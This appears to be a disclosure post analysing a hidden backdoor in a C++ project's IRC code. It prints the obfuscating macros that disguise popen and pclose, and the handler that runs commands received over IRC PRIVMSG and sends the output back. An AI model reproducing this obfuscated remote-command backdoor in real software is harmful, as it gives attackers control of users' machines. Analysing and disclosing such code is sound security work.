There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
```cpp
/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c
/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)
/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"
```
Then in irc.cpp they are used to implement the backdoor:
```cpp
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
```
I expect this is a known issue since this kind of thing doesn't happen accidentally.